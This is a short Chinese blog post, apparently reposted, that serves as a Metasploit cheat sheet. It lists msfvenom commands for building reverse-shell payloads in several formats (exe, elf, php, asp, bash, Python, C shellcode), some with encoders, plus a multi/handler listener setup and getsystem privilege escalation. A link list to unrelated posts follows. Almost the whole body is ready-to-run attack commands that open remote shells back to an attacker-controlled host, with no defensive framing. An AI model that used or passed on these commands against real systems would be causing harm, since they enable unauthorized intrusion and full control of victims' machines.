Msf提权步骤
2024-10-15 11:29:31
1、生成反弹木马(脚本,执行程序)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe
2、MSF接受设置
1 use exploit/multi/handler
2 set payload windows/meterpreter/reverse_tcp
3 set LHOST 192.168.1.111
4 Exploit
3、采用自动化提权,调用其他EXP进行提权
Getuid 查看当前权限
Getsystem 自动化提升
4、MSF Payloads
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
2 msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
3 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
4 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
MSF 生成在 Linux 下反弹的 Meterpreter Shell
1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反弹 Shell (C Shellcode)
1 msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
MSF 生成反弹 Python Shell
1 msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反弹 ASP Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
MSF 生成反弹 Bash Shell
1 msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
MSF 生成反弹 PHP Shell
1 msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
2 add <?php at the beginning
3 perl -i~ -0777pe's/^/<?php \n/' shell.php
MSF 生成反弹 Win Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
from:http://www.cnblogs.com/sqyysec/p/6915492.html
最新文章
- Windows版的各种Python库安装包下载地址与安装过程
- Beta版本冲刺———第三天
- python 学习笔记6(数据库 sqlite)
- 使用ASP.NET操作IIS7中使用应用程序
- 系统后台图表生成文档说明-javascript
- ifndef系列
- php 学习路线 赵兴壮2014年4月28 日 加油
- uwsgi服务启动(start)停止(stop)重新装载(reload)
- MySQL - 高可用性:少宕机即高可用?
- qt连接数据库Sqlite
- 5.cgroup资源控制
- 网页分帧操作<;frameset>;,<;iframe>;标签
- Nginx 多域名配置
- ubuntu下安装owncloud提示没有zip模块时
- js 的date的format时间,获取当前时间,前一天的日期
- 自学Zabbix3.5.1-监控项item-key介绍
- 小数点保留若干位小数 %.*f
- Centos 批量分发脚本
- iOS之safari调试iOS app web页面
- hibernate的注解属性mappedBy详解【实际项目】
热门文章
- 上线---苹果AppStore审核注意事项,Guideline 1.2 - Safety - User Generated Content,2.1等条例(苹果审核六次拒绝)
- iOS 技术篇: 如何利用dsym文件分析苹果被拒日志
- 每日踩坑 2019-04-08 VS2015未能找到路径“…\bin\roslyn\csc.exe”的解决方案
- Java表达式转型规则
- 如何实现跨域获取iframe子页面动态的url
- sqlite 一条记录判断一个字段是否like另一个字段
- 关于产品UE的胡思乱想
- Go语言之高级篇beego框架之模型(Models)
- C#中流的读写器BinaryReader、BinaryWriter,StreamReader、StreamWriter详解【转】
- Amazon.com 美国亚马逊 直邮中国 手把手教程(转)